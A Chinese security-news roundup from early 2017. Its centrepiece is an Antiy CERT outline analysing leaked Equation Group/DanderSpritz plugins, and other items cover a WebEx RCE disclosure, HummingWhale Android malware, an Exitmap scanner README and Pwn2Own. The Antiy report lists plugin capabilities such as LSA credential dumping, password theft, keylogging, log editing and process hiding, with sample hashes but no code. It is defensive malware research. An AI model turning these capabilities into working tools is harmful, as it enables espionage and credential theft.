匿名搜索引擎 DuckDuckGo 的搜索量超 100 亿次

人们对自己的隐私权利越来越看重,对谷歌等浏览器的信任度不像以前那般强,因此像 DuckDuckGo 这样的注重个人隐私的匿名浏览器抓住了机会,自 8 年前这款浏览器推出之日起,其搜索量就一直保持惊人的速度增长,2013 年斯诺登首次向公众披露美国政府对民众的监听计划后,DuckDuckGo 的搜索量更是呈爆炸性增长。

DuckDuckGo 浏览器方面称,至今一共提供了超过 100 亿次的搜索服务,其中仅去年一年就有 40 亿次搜索,增长速度是历年来最高的。在 2017 年 1 月 10 日这一天,该浏览器的搜索次数达到了 1400 万次。2016 年,DuckDuckGo 网站还曾向美国 9 家组织捐款 225000 美元,以提高信任网络的管制标准。

22

稿源:cnbeta,有删改,封面来源:百度搜索0day

WebEx 浏览器插件现远程代码执行漏洞,或诱发大规模攻击事件

23 日,Google Project Zero 安全专家 Tavis Ormandy 对外表示,Cisco WebEx 浏览器插件中存在一个严重的远程代码执行漏洞,或可诱发大规模攻击事件。

wechatimg012406

专家发现攻击者可使用包含 magic (魔术)字符串的任意 URL 触发漏洞,从而达到在 WebEx 用户系统上执行任意代码的目的。思科曾试图通过限制 https:// * .webex.com 和 https:// * .webex.com 域来解决这一问题,但并未达到效果。研究员强调,由于 magic 模式内嵌于 <iframe> 标签中,即使没有 XSS 攻击者仍可执行任意代码。

Mozilla 方面对思科的修复方式并不满意,同时指出 webex.com 没有严格遵循 Web安全协议(HSTS)和内容安全策略(CSP)。目前谷歌和 Mozilla 表示已暂时从应用商店中删除了 WebEx 插件,直至 Cisco 发布正确的解决方案为止。考虑到 Google Chrome 的 WebEx 插件至少有 2000 万活跃用户,这一漏洞的爆发恐将造成重大影响。

wechatimg012404

安全专家 Ormandy 已对外发布 PoC 进行漏洞演示,只需用户电脑上装有 WebEx 插件即可成功复现漏洞。演示链接:https://lock.cmpxchg8b.com/ieXohz9t/

稿源:HackerNews.cc?翻译/整理,封面来源:百度搜索。
转载请注明“转自 HackerNews.cc ” 并附上原文链接,违者必究。0day

网络入侵太频繁,欧盟考虑对银行业展开安全测试

据路透社消息,由于越来越多的银行机构遭遇黑客入侵,欧盟正考虑对银行的网络防御能力展开压力测试。最近几年,针对银行机构的网络攻击愈演愈烈,且入侵手段越来越高明。

去年 2 月,孟加拉国央行在美国纽约联邦储备银行开设的账户遭黑客攻击,失窃 8100 万美元。孟加拉国央行怀疑,黑客事先给央行的一台打印机植入木马病毒,造成看似平常的“故障”,导致央行没能及时察觉这起震惊全球金融界的窃案。事件发生后,全球监管部门都加强了对银行的安全需求。虽然如此,复杂的网络攻击仍层出不穷。去年 11 月,英国零售巨擘特易购(Tesco)旗下银行发现,约 9000 个帐户被黑客入侵,总计 250 万英镑被盗领。

对此,欧洲银行管理局(EBA)去年 12 月发布报告称:“黑客未授权访问银行关键系统和数据的威胁与日俱增,而银行却没有足够的能力来应对。”知情人士透露,欧盟监管部门强化安全的下一步行动将是在欧盟范围内展开压力测试,预计于明年年中展开。

欧洲中央银行(ECB)去年曾宣布,将在欧元区 19 个国家之间建立一个专门的数据库来登记网络犯罪事件。但是,这 19 个国家之间的信息交换十分匮乏。欧洲银行管理局一官员对此表示,他们一直都在关注网络安全问题,但针对压力测试问题,目前尚未做出决定。

稿源:cnbeta,有删改,封面来源:百度搜索0day

方程式组织EQUATION DRUG平台解析(提纲) —方程式组织系列分析报告之四

安天安全研究与应急处理中心(Antiy CERT)

报告初稿完成时间:2017年1月13日 16时00分
首次发布时间:2017年1月16日 10时00分
本版本更新时间:2017年1月17日 8时30分

1

1 ?背景


 

对于“方程式组织”,在过去的两年中,安天已经连续发布了三篇分析报告:在《修改硬盘固件的木马——探索方程式(EQUATION)组织的攻击组件》[1] 中,安天对多个模块进行了分析,并对其写入硬盘固件的机理进行了分析验证;在《方程式(EQUATION)部分组件中的加密技巧分析》[2]报告中,对攻击组件中使用的加密方式实现了破解;在《从“方程式”到“方程组”——EQUATION攻击组织高级恶意代码的全平台能力解析》[3]报告中,安天独家提供了方程式Linux和Solaris系统的样本分析,这也是业内首次正式证实这些“恶灵”真实存在的公开分析。

APT的分析成果,与研发反APT产品一样,都要基于充分的基础积累,而不可能“一夜之间建成罗马”,对于方程式这样大至无形的超级攻击组织来说,我们过去所做的具体的分析工作都是盲人摸象的过程,一旦飘忽的线索落入我们已经摸索过的范围之内,就可以迅速发布储备成果,而如果面对的是一个未曾充分探查的区域,则需要更长的时间展开分析工作,因此与安天此前已经发布的3篇方程式的长篇报告相比,本篇报告的当前版本是比较仓促的,因此我们称之为“提纲”,我们旨在能抛砖引玉,邀请更多兄弟团队共同加入分析工作,以便进一步呈现出其全貌。

本篇分析是围绕2017年1月12日,“影子经纪人”放出Equation Group 组件中的61个文件[4] 展开的。经分析,本次放出的61个文件中,其中含有Equation Group 组件和DanderSpritZ(RAT)工具中的一些插件。DanderSpritZ是NSA(National Security Agency)的间谍工具之一,在1月7号“影子经纪人”放出的Windows攻击工具[5]中也包含了大量DanderSpritZ的插件名称。

组件EquationDrug是一个很复杂的模块。其存活时间有近10年,后来被GrayFish升级替代。EquationDrug到GrayFish是攻击平台级别的恶意代码体系,它具有安装与卸载插件功能。本次“影子经纪人”放出的文件中,我们看到了更多的EquationDrug组件中的插件。通过分析比对发现,这些插件比之前安天分析过的插件版本低,但相对更为全面。

至今,安天已经完成了对插件功能列表和部分插件的关联分析,先将此部分的分析工作对外分享,后续会将更多的信息分享。

2 方程式线索曝光和分析成果时间链梳理


 

2013年起,安天从样本分析中,逐步发现存在一个拥有全平台载荷攻击能力的攻击组织,并逐步关联分析了其多个平台的样本。在这个过程中,我们感到一个大至无形的超级攻击组织存在,但我们并未找到其攻击背景。

2015年2月,卡巴斯基实验室曝光了一个名为方程式(Equation Group)[6]的攻击组织,卡巴斯基认为该组织活跃近20年,可能是目前世界上存在的最复杂的APT攻击组织之一,并认为该组织是震网(Stuxnet)和火焰(Flame)病毒幕后的操纵者。经过线索比对,安天发现这正是此前一直跟踪的超级攻击组织,决定通过报告公开其针对硬盘固件作业的原理[1]和所破解的其部分加密算法[2],形成了安天对于方程式系列分析的前两篇报告。,

2015年3月,卡巴斯基实验室发布了基于Equation Drug组件或平台的剖析[7],Equation Drug是“方程式组织”所用的主要间谍组件或平台之一,最早追溯到2001年,并且一直沿用至今。该组件或平台的架构类似于一个具有内核模式和用户模式的微型操作系统,通过自定义接口进行交互,该组件或平台包括驱动程序、平台内核(协调器)和若干插件,其中一些插件配备独特的ID和版本号,用于定义相关功能等。

2016年8月,一个自称“影子经纪人”(The Shadow Brokers)的个人(或组织)声称入侵了网络间谍组织“方程式”(Equation)[8],并以100万比特币(当时约价值5.6亿美元)的价格,公开“拍卖”所掌握的方程式组织的攻击工具。“方程式组织”被认为与NSA存在联系。为证明成功入侵的真实性,影子经纪人于当月13日在开源项目托管平台GitHub加密发布了这些攻击工具,并有意将其中的少量攻击工具以明文形式发布。

2016年8月,卡巴斯基实验室通过对“方程式组织”与“影子经纪人”曝光的数据进行对比验证[9],确认了曝光的数据与“方程式组织”有关。2016年10月,影子经纪人对攻击工具再度发起拍卖[10],并称在GitHub发布的方程式攻击工具只占其掌握的60%。

11月,影子经纪人公开了一份遭受入侵的服务器清单[11],并称攻击方与NSA有关。清单的日期显示,各系统遭受入侵的时间在2000年到2010年之间,受控IP及域名分布在49个国家,主要集中在亚太地区,受影响的国家包括中国、日本、韩国、西班牙、德国、印度等。 安天将这些数据导入到安天态势感知和预警平台,形成了下图的可视化展现。

2

图 1 安天态势感知与监控预警平台:“方程式”组织对全球互联网节点的入侵可视化复现

 

影子经纪人的爆料中,提及相关服务器可能是Linux、FreeBSD和Solaris。而在2016年上半年的两次技术会议中,安天则明确说明,方程式有针对多个系统平台的样本,其中包括Linux和Solaris。安天最终于11月5日公开了方程式组织针对Linux和Solaris的部分样本载荷的分析报告(安天方程式系列报告之三)。

安天分析团队对小组“方程式”上述信息进行了梳理,整理出方程式事件曝光和相关分析的时间链。

3

图 2 方程式事件相关信息曝光和厂商分析的时间链

3 DanderSpritz攻击平台

安天通过对本次泄露的文件以及对以往方程式资料的分析发现,“方程式组织的“EquationDrug”平台与泄露文件中提到的“DanderSpritz”具有一定内在联系:

  1. 本次泄露的msgkd.ex_、msgki.ex_、msgks.ex_、msgku.ex_为GROK插件,是“DanderSpritz”的插件或模块,该插件在“EquationDrug”平台中也曾出现,通过分析发现本次泄露的GROK为低版本GROK插件。
  2. 本次曝光的各类DLL插件中一处数据为插件ID,插件ID都是以0x79开头,如:0x79A4、0x79D8,同样,“EquationDrug”平台的插件也设有内置ID,“EquationDrug”平台的插件ID为0x80开头。且两个平台的插件导出函数参数的数据结构也存在相似之处。

因此,基本可以认为方程式组织使用的“EquationDrug”攻击平台与“DanderSpritz” 使用了相同的架构设计, 两者可能是不同的版本代号,或至少来自同一开发团队,或资源高度共享的团队。

4

图 3 方程式组织的DanderSpritz攻击平台

5

图 4 “影子经纪人”泄露的“DanderSpritz”攻击平台截图

本次“影子经纪人”曝光的文件中多数为“DanderSpritz”平台的攻击插件,从放出的文件列表HASH和截图来看,攻击工具和插件非常丰富且标准化,具体包括远控、漏洞利用、后门、插件等,DanderSpritz_All_Find.txt文件内容多达7千余行,其中插件有数百个之多,我们将泄露出来的61个文件进行梳理,分析出了部分插件的功能,如下表(后续版本会持续更新插件确认结果):

原始文件名 编号ID 说明
DoubleFeatureDll.dll.unfinalized 该模块用于创建线程执行函数,地址由调用者传入。
DuplicateToken_Implant.dll 该模块用于获取Token,并执行操作。
DuplicateToken_Lp.dll 0x79E2 该模块用于获取Token,并执行操作。
DXGHLP16.SYS 该模块用于对网络进行嗅探,监测以太网和VPN的流量,用于Windows 9x系统。
EventLogEdit_Implant.dll 该模块可对事件日志文件进行编辑。
EventLogEdit_Lp.dll 0x79B1 该模块可对事件日志文件进行编辑。
GetAdmin_Implant.dll 该模块用于获取管理员权限,并执行操作。
GetAdmin_Lp.dll 0x79A8 该模块用于获取管理员权限,并执行操作。
kill_Implant.dll 该模块功能是结束进程。
kill_Implant9x.dll 该模块功能是结束进程。
LSADUMP_Implant.dll 该模块可用来读取LSA凭据,根据传入参数的不同执行不同的操作。
LSADUMP_Lp.dll 0x79C9 该模块可用来读取LSA凭据,根据传入参数的不同执行不同的操作。
modifyAudit_Implant.dll 该模块用于修改审核配置。
modifyAudit_Lp.dll 0x79C8 该模块用于修改审核配置。
modifyAuthentication_Implant.dll 该模块用于修改权限认证。
modifyAuthentication_Lp.dll 0x79EF 该模块用于修改权限认证。
ModifyGroup_Implant.dll 该模块用于修改用户组权限。
ModifyGroup_Lp.dll ?0x79ED 该模块用于修改用户组权限。
ModifyPrivilege_Implant.dll 该模块用于修改用户权限。
ModifyPrivilege_Lp.dll 0x7995 该模块用于修改用户权限。
msgkd.ex_ 释放GROK键盘/剪贴板记录器驱动。
msgki.ex_ 释放GROK键盘/剪贴板记录器驱动。
msgks.ex_ 释放GROK键盘/剪贴板记录器驱动。
msgku.ex_ 释放GROK键盘/剪贴板记录器驱动。
mssld.dll 待确认
msslu.dll 待确认
mstcp32.sys 该模块用于对网络进行嗅探监测以太网和VPN的流量 。
nethide_Implant.dll 该模块用于隐藏网络连接。
nethide_Lp.dll 0x79CA 该模块用于隐藏网络连接。
ntevt.sys 该模块是事件日志相关驱动。
ntevtx64.sys 该模块是64位事件日志相关驱动。
ntfltmgr.sys 待确认
PassFreely_Implant.dll 待确认
PassFreely_Lp.dll 0x79DB 待确认
PC_Legacy_dll 待确认
PC_Level3_dll 待确认
PC_Level3_dll_x64 待确认
PC_Level3_flav_dll 待确认
PC_Level3_flav_dll_x64 待确认
PC_Level3_http_dll 待确认
PC_Level3_http_dll_x64 待确认
PC_Level3_http_flav_dll 待确认
PC_Level3_http_flav_dll_x64 待确认
PC_Level4_flav_dll 待确认
PC_Level4_flav_dll_x64 待确认
PC_Level4_flav_exe 待确认
PC_Level4_http_flav_dll 待确认
PC_Level4_http_flav_dll_x64 待确认
PortMap_Implant.dll 该模块用于进行端口映射。
PortMap_Lp.dll 0x79BB 该模块用于进行端口映射。
ProcessHide_Implant.dll 该模块用于进行隐藏进程。
ProcessHide_Lp.dll 0x79AC 该模块用于进行隐藏进程。
processinfo_Implant.dll 该模块可以用来获取进程信息。
processinfo_Implant9x.dll 该模块可以用来获取进程信息,支持Windows 9x。
ProcessOptions_Implant.dll 该模块用于设定进程执行属性。
ProcessOptions_Lp.dll 0x79D8 该模块用于设定进程执行属性。
pwdump_Implant.dll 该模块可用来读取系统中密码。
pwdump_Lp.dll 0x79CD 该模块可用来读取系统中密码。
RunAsChild_Implant.dll 该模块用于创建子进程,并执行操作。
RunAsChild_Lp.dll 0x79A4 该模块用于创建子进程,并执行操作。
tdi6.sys 该模块用于对网络进行嗅探 监测以太网和VPN的流量 。

6

图 5 曝光的“DanderSpritz”平台的攻击插件截图

“DanderSpritz”一词在“棱镜”事件中曾被曝光,文件指出该平台是NSA用于全球监控的网络武器,可被用于多种作业场景,如下图中“FIREWALK”[12]工具用于网络流量采集和注入,其说明中提及到了DNT的“DanderSpritz”,DNT与ANT同属于NSA的网络组织,“方程式”与NSA再一次被联系到一起。

6

图 6 斯诺登曝光的NSA-ANT网络武器FIREWALK

NSA-ANT网络武器最早在2013年从斯诺登事件中曝光,共包含48个攻击武器,随着事件的发酵,不断有媒体和组织对其进行曝光,安天分析工程师根据目前曝光的全部资料尝试初步绘制了相关攻击装备的图谱,其相关映射关联还在进一步的维护中。

7

图 7 NSA-TAO攻击装备体系(完善中)

4 ?部分组件与插件分析(继续完善中)


 

4.1 ? GROK键盘与剪贴版记录器驱动

本次泄露的恶意代码中包含四个功能相似的GROK组件,它们都是PE文件,版本为1.2.0.1,均可以从资源段中解密并释放键盘与剪贴版记录器驱动msrtdv.sys。

4.1.1????????? 样本标签

病毒名 Trojan/Win32.EquationDrug
原始文件名 msrtdv.sys
MD5 6A4461AF87371B89D240A34846A7BC64
处理器架构 X86-32
文件大小 36.3 KB (37,248 字节)
文件格式 BinExecute/Microsoft.SYS[:X86]
时间戳 0x4B7F1480—>2010-02-20 06:45:20

该恶意代码样本是键盘记录器及剪贴版监视工具,在之前友商报告中曾经提到过有相似功能的恶意代码,下面对其相似之处进行对比。

4.1.2 ?版本信息

样本包含版本信息,文件版本为5.1.1364.6430,源文件名为msrtdv.sys,文件描述为MSRTdv interface driver。其中文件版本低于之前已经曝光的版本5.3.1365.2180,源文件名与文件描述的不同在于将两个字母“d”和“v”的位置互换,一个是“mstrdv.sys”,另一个是“msrtvd.sys”。

8

图 8 本次泄露版本与之前曝光版本的版本信息

4.1.3 ? ?主要功能

两个不同版本的样本其主要功能相同,通过给转储程序建立专用的进程来汇集所收集的数据,每隔30分钟,将结果压缩到文件”%TEMP%\tm154o.da”。之前曝光的版本中,包含多个IoControlCode,分别对应不同的功能。

9

图 9 之前曝光版本的主要功能代码

而本次泄露的样本中,IoControlCode虽然只有0x22002C,但一些主要功能仍然存在,可以通过反编译后的代码看出它们的相同之处。

10

图 10 本次泄露版本的主要功能代码

从以上分析比较中可以发现,本次泄露的恶意代码样本应为较低版本,无论从版本信息还是功能上,都要低于之前曝光的版本。在影子经纪人泄露出的文件DanderSpritz_All_Find.txt中,GROK的版本号也清楚的说明了这个问题,影子经纪人所释放出的只是GROK组件的低版本部分文件,高版本仍然被其掌握在手中。

11

图 11 GROK组件的不同版本号

4.2???????? Processinfo插件遍历进程模块

本插件用于实现对指定进程的模块遍历,并调用上层模块预设的回调函数。

4.2.1 样本标签

病毒名 Trojan/Win32.EquationDrug
原始文件名 processinfo_Implant9x.dll
MD5 6042EA9707316784FBC77A8B450E0991
处理器架构 X86-32
文件大小 8 KB (8,192 字节)
文件格式 BinExecute/Microsoft.DLL[:X86]
时间戳 45A40EC7->2007-01-10 05:53:11

,

4.2.2 ?主要功能

本插件提供四个基于序号导出的函数。

序号 功能
1 设置上层模块回调函数,创建互斥体
2 释放资源
3 返回核心功能函数地址
4 获取插件版本信息

12

图 12 1号导出函数 设置上层模块回调函数

13

图 13 3号导出函数 返回核心功能函数地址

14

 

图 14 4号导出函数 获取插件版本信息

15

图 15 遍历指定进程,默认为当前进程

16

图 16 遍历指定进程模块,计算模块对应文件HASH(SHA1)

4.3???????? kill_Implant插件杀进程模块

4.3.1????????? 样本标签

病毒名 Trojan/Win32.EquationDrug
原始文件名 kill_Implant.dll
MD5 BDD2B462E050EF2FA7778526EA4A2A58
处理器架构 X86-32
文件大小 21 KB(21,504 字节)
文件格式 BinExecute/Microsoft.DLL[:X86]
时间戳 45A40616->2007-01-10 05:16:06

 

4.3.2 ?主要功能

模块调用者传递进来进程ID,该模块利用函数OpenProcess获取句柄,再利用函数TerminateProcess结束对应进程。

17

图 17 结束进程

5 ?小结


 

此次“影子经纪人”释放的Equation Group中的61个文件,对于全球网络安全研究者分析厘清EQUATION相关攻击平台的组成和架构有很大帮助,而经过打通分析相关曝光信息,我们看到了该攻击平台的更多的信息,如数百个攻击插件以及“DanderSpritz”攻击平台。

通过对相关文件分析后,安天分析小组可以判断其中部分组件与之前卡巴斯基所曝光的GROK组件为同类样本,而这些组件为早期的低版本。另外,我们的分析结果也表明了“DanderSpritz”与Equation Drug使用相同的组件和架构设计,“DanderSpritz”可能就是方程式组织使用的Equation Drug攻击平台。

由于时间仓促,我们目前只披露了部分文件和泄露信息的相关分析成果,后续我们的分析工作还会继续进行下去。

五年前,在安天展开针对Flame(火焰)蠕虫的马拉松分析中,有专家曾提醒我们不要“只见树叶,不见森林”,这让我们深刻的反思了传统分析工程师“视野从入口点开始”的局限性,而开始尝试建立起从微观见宏观的分析视野。

对安天来说,这四年以来,对方程式组织的持续跟踪分析,对安天是极为难得的了解最高级别攻击者(即我们所谓A2PT,‘高级的APT’)的经历。深入研究这种具有超级成本支撑和先进理念引领的超级攻击者,对于改善安天探海、智甲、追影等高级威胁检测防御产品的防御能力也非常关键。但对于应对A2PT攻击者来说,无论是有效改善防御,还是进行更为全面深入系统的分析,都不是一家安全企业能够独立承载的。此中还需要更多协同,更多的接力式分析,而不是反复重复的发明轮子。正是基于这种共同认知,在不久之前第四届安天网络安全冬训营上,安天和360企业安全等安全企业向部分与会专家介绍了能力型安全厂商分析成果互认的部分尝试。只有中国的机构用户和能力型安全厂商形成一个积极互动的体系,才能更好的防御来自各方面的危险。

我们警惕,但并不恐惧,对于一场防御战来说,除了扎实的架构、防御、分析工作之外,必胜的信念是一个前提。

无形者未必无影, 安天追影,画影图形!

附录一:参考资料


 

[1]????? 安天:修改硬盘固件的木马 探索方程式(EQUATION)组织的攻击组件

http://www.antiy.com/response/EQUATION_ANTIY_REPORT.html

[2]????? 安天:方程式(EQUATION)部分组件中的加密技巧分析

http://www.antiy.com/response/Equation_part_of_the_component_analysis_of_cryptographic_techniques.html

[3]????? 安天:从“方程式”到“方程组”EQUATION攻击组织高级恶意代码的全平台能力解析

http://www.antiy.com/response/EQUATIONS/EQUATIONS.html

[4]????? THESHADOWBROKERS CLOSED, GOING DARK

https://onlyzero.net/theshadowbrokers.bit/post/messagefinale/

[5]????? Stolen NSA “Windows Hacking Tools” Now Up For Sale!

http://thehackernews.com/2017/01/nsa-windows-hacking-tools.html

[6]????? Kaspersky:Equation: The Death Star of Malware Galaxy

http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/

[7]????? Kaspersky:Inside the EquationDrug Espionage Platform

https://securelist.com/blog/research/69203/inside-the-equationdrug-espionage-platform/

[8]????? Equation Group Cyber Weapons Auction – Invitation

https://github.com/theshadowbrokers/EQGRP-AUCTION

[9]????? The Equation giveaway

https://securelist.com/blog/incidents/75812/the-equation-giveaway/

[10]?? I just published “TheShadowBrokers Message #3”

https://medium.com/@shadowbrokerss/theshadowbrokers-message-3-af1b181b481

[11]?? Shadow Brokers reveals list of Servers Hacked by the NSA

http://thehackernews.com/2016/10/nsa-shadow-brokers-hacking.html

[12]?? ANTProductData2013

https://search.edwardsnowden.com/docs/ANTProductData2013-12-30nsadocs

[13]?? Kaspersky:A Fanny Equation: “I am your father, Stuxnet”

http://securelist.com/blog/research/68787/a-fanny-equation-i-am-your-father-stuxnet/

[14]?? Kaspersky:Equation Group: from Houston with love

http://securelist.com/blog/research/68877/equation-group-from-houston-with-love/

[15]?? Kaspersky:Equation_group_questions_and_answers

https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

[16]?? Kaspersky:The Equation giveaway

https://securelist.com/blog/incidents/75812/the-equation-giveaway/

【原文:方程式组织EQUATION DRUG平台解析(提纲)—方程式组织系列分析报告之四? ?安全脉搏编辑整理发布】0day

苹果四平台同时更新:修复漏洞和问题 提升性能

苹果今天凌晨放出了 macOS Sierra 10.12.3 的正式版,这是 macOS Sierra 自发布以来的第三次升级,macOS 10.12.3 距离上个版本 10.12.2 发布过去了一个多月的时间。

macOS Sierra 10.12.3 目前已经推送给大部分用户,设备符合条件的朋友可以在 Mac App Store 中下载本次更新。在此前的测试版本当中,用户没有在这个版本中发现新功能的加入,苹果只是表示该版本主要是改进稳定性、兼容性和 Mac 的安全性,那么在正式版中又有什么内容呢?

苹果的官方更新日志写道:

– 提高了 MacBook Pro(15 英寸,2016 年 10 月)上的自动切换图形卡模式

– 解决了在配备 Multi-Touch Bar 的 MacBook Pro(13 英寸和 15 英寸,2016 年 10 月)上编码 Adobe Premiere Pro 项目时,图形卡存在的问题

– 修正了在“预览”中无法搜索已扫描的 PDF 文稿的问题

– 解决了加密 PDF 文稿输出的兼容性问题

– 修正了一些第三方应用无法正确从数码相机导入照片的问题

如果你遇到了上述问题的话,苹果建议你更新到最新版的 macOS Sierra 系统。如果你还在该版本中发现了其它新功能的话,不妨和我们一起分享。

此外,今天苹果公司也发布了 iOS 10.2.1、tvOS 10.1.1 以及 watchOS 3.1.3,更新的具体内容如下:

在 iOS 10.2.1 更新中包括 iPhone 及 iPad 的错误修正及改善安全性。iOS 10.2.1 的发布距离上一个版本 iOS 10.2 相隔超过 1 个月的时间。iOS 设备用户可以通过 OTA 无线升级至 iOS 10.2.1,同时也可以通过 Mac 或 PC 平台上的 iTunes 下载软件升级,完成更新。在测试之中,苹果并没有提到任何新功能。

此前有消息称苹果将在 iOS 10.3 中加入全新的“剧场模式”,但 iOS 10.3 的测试版发布时间还不确定。

tvOS 10.1.1 则是在 tvOS 10.1 发布后 5 个星期才发布,此前苹果仅发布了 tvOS 10.1.1 的两个测试版供开发者进行测试,需要本次更新的用户可以在 Apple TV 的设置应用中找到本次更新。当然如果你已经打开了自动更新功能,那么你的 Apple TV 就会自动进行更新,用户无需任何操作。tvOS 10.1.1 中没有增加什么新的特性,主要还是修复漏洞,优化性能。

今天同步释出的还有 watchOS 3.1.3。去年 12 月份苹果公司发布了 watchOS 3.1.1 更新,但是用户反映安装该更新之后设备变砖,无法恢复,因此苹果撤销了该次更新。

watchOS 3.1.3 更新中应该已经解决了这个问题,你可以在 iPhone 的 Apple Watch 应用中找到这次更新。要安装本次更新,需要确保 Apple Watch 的电池至少为 50%,Apple Watch 必须连接着充电器,而且是在 iPhone 的连接范围之内。支持它进行更新的 iPhone 需运行 iOS 10 及以上版本。

watchOS 3.1.3 中也没有添加什么重大功能或者特性,修复了信息、通知、活动、日历等应用中的漏洞。苹果并没有发布 watchOS 3.1.2 更新,而是直接从 watchOS 3.1.1 跳到了 watchOS 3.1.3。

苹果今天还更新了 iTunes 12.5.5,主要也是修复漏洞,强化性能。0day

Android恶意程序利用虚拟机悄悄安装应用

Android恶意程序HummingWhale利用奇虎手机助手团队开发的插件DroidPlugin实现虚拟机功能悄悄在用户设备上安装应用。HummingWhale的传播方法不是通过第三方应用商店,而是隐身于官方应用商店 Google Play,它的大约20款恶意应用被200万到1200万毫无防备的用户下载。这一事件显示,即使官方商店的应用也不能完全信任。Google在接到安全研究人员的通知后已经将恶意应用移除。HummingWhale主要通过两种方法产生收入:展示广告和自动安装应用。它将应用安装在虚拟机里,创建假的ID获取应用推荐收入。安装在虚拟机里的好处是安装时不需要用户批准权限,此外虚拟机还可以隐藏其恶意活动,让它还可以在被感染设备上安装无限的应用。HummingWhale还被观察到能自动生成好评掩盖差评。0day

Exitmap:Tor出口中继节点扫描器

工具简介

Exitmap是一个基于Python的Tor出口中继节点扫描器,具有快速和模块化的特点。 Exitmap模块执行在所有出口中继节点(的子集)上运行的任务。如果你有函数式编程的知识背景,可以把Exitmap看作是Tor出口中继节点的map()接口。

这些模块可以执行任何基于TCP的网络任务,例如获取网页、上传文件、连接到SSH服务器或加入IRC频道(Internet Relay Chat,互联网中继聊天,它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议)。

Exitmap的实际功能是监测出口中继节点的可靠性。当然很多人会利用Exitmap在Tor项目的检查服务中检查误报情况,并发现恶意的出口中继节点。为Exitmap开发新的模块也非常便捷,只需查看doc或目录中的HACKING文件,或者查看其中一个现有模块即可。

Exitmap使用Stem为所有给定的出口中继节点创建线路,并且一旦tor向Exitmap发出线路已建立的通知,Exitmap就会为新建立的线路调用模块。模块可以是纯Python脚本,也可以是可执行文件。对于可执行文件则需要用到torsocks工具(https://github.com/dgoulet/torsocks/)。

最后请注意Exitmap是一个网络评估工具,对普通的Tor用户没有用。Tor项目正在定期运行该工具,过多的Exitmap扫描只会导致额外的网络负载。Exitmap之所以开源是因为有人可能会对其源代码和结构感兴趣。

安装

Exitmap使用Stem库(Tor的python控制器库)与Tor进行交互。安装Stem的方式很多,最简单的应该是使用pip与现有的requirements.txt文件结合:

$ pip install -r requirements.txt

运行Exitmap

Exitmap所需的唯一参数是模块名称。例如,你可以通过以下方式运行Exitmap的checktest模块:

$ ./bin/exitmap checktest

然后命令行输出将显示如何进行Tor bootstrap,checktest模块输出和扫描摘要。如果你不需要3个hops,倾向于使用在静态的第一个hop之后的两个hops,请运行:

$ ./bin/exitmap –first-hop CCEF02AA454C0AB0FE1AC68304F6D8C4220C1912 checktest

若在德国出口中继节点上运行同样的测试,请执行:

$ ./bin/exitmap –country DE –first-hop CCEF02AA454C0AB0FE1AC68304F6D8C4220C1912 checktest

如果要在线路创建之间暂停五秒钟以减少Tor网络和扫描目标的负载,请运行:

$ ./bin/exitmap –build-delay 5 checktest

注意:

CCEF02AA454C0AB0FE1AC68304F6D8C4220C1912是一个由瑞典卡尔斯塔德大学运行的出口节点,你可以自由使用。但是分配扫描负载时请尽量使用自己的出口中继节点。

若想看到Exitmap的其它选项,请运行:

$ ./bin/exitmap –help

功能

Exitmap包含以下模块:

testfds:测试某出口中继节点是否能够获取简单网页的内容。若不能则说明该出口中继节点可能没有足够可用的文件描述符(打开一个文件需要维护很多数据,不光是权限的问题,内核对每一个打开文件都分配了一个数据结构,而文件描述符则是指向这些数据结构的索引,内核可以通过一个文件描述符查到相应文件的数据)。

checktest:尝试发现Tor项目检查服务中的误报。

dnspoison:尝试解析多个域名,并将接收到的DNS A记录与预期记录进行比较。

dnssec:检测解析器不证实DNSSEC(DNS安全扩展)的出口中继节点。

patchingCheck:检查是否存在文件篡改。

cloudflared:检查网站是否返回CloudFlare的验证码。

rtt:测量从某出口到各个目的地的往返时间。

配置

默认状态下,Exitmap会读取你的主目录中的.exitmaprc文件。该文件能够接受所有命令行选项,但是你必须用下划线代替减号。例如:

[Defaults]

first_hop = CCEF02AA454C0AB0FE1AC68304F6D8C4220C1912

verbosity = debug

build_delay = 1

analysis_dir = /path/to/exitmap_scans

测试

在提交代码合并请求之前,通过运行以下程序来确认所有配置均已通过测试:

$ pip install -r requirements-dev.txt

$ py.test –cov-report term-missing –cov-config .coveragerc –cov=src test

Exitmap下载链接:https://codeload.github.com/NullHypothesis/exitmap/zip/v2016.04.21

若对Exitmap的使用存在任何问题,可联系Philipp Winter phw@nymity.ch。0day

2017年Pwn2Own破解大赛剑指Linux、服务器和Web浏览器

Pwn2Own黑客大赛10周年版,奖金超过100万美元,目标范围涵盖虚拟机、服务器、企业应用和Web浏览器。

过去十年,零日计划(ZDI)年度Pwn2Own竞赛,成为了信息安全日历上开年重大活动之一,2017年也不例外。作为Pwn2Own竞赛十周年纪念,如今由趋势科技操办的ZDI,将比之前任何一次都走得更远,目标更多,奖金更高,只要成功执行零日漏洞利用即可获得不菲奖金。

2016年,HPE将其包含有ZDI的TippingPoint部门,以3亿美元的价格,出售给了趋势科技公司。该年的Pwn2own竞赛是两家公司联合举办的。2016年为期2天的竞赛中,成功证明了总共21个零日漏洞的研究人员,分享了46万美元的奖金。

Pwn2own 2017 将与CanSecWest大会一起,于3月15-17日在加拿大温哥华举行。2017大赛将由趋势科技独立赞助,且与去年的大赛不同,不再专注于Web浏览器。

今年的目标中出现了虚拟机,包括VMware和微软Hyper-V系统。研究人员需要从客户虚拟机执行虚拟化管理程序逃逸,以在底层托管操作系统中运行任意代码。成功进行虚拟机逃逸的安全研究员,将获得ZDI提供的10万美元奖励。

趋势科技漏洞研究高级经理布莱恩·戈伦茨说:“我们每年都会考虑新目标。”

Pwn2Own大赛之外,ZDI还是从研究人员那里搜罗安全漏洞的产业,通过其项目主动寻求虚拟机逃逸技术。

Pwn2Own有望提升研究人员的认识,未来可能看到更多此类报告。但尽管虚拟机在本届Pwn2Own目标列表当中,Docker容器却没有。

Linux

过去十年,Pwn2Own针对过基于苹果macOS和微软Windows的技术,但在2017年,开源Linux操作系统终于进驻目标列表。

在两项独立挑战中,研究人员将特别针对 Ubuntu 16.10 Linux操作系统。一项是权限提升,另一项是服务器端Web托管利用。

只要能利用Linux内核漏洞提升权限,研究人员便会得到1.5万美元的奖励。Windows上的提权奖励为3万美元,macOS提权奖励则是2万。

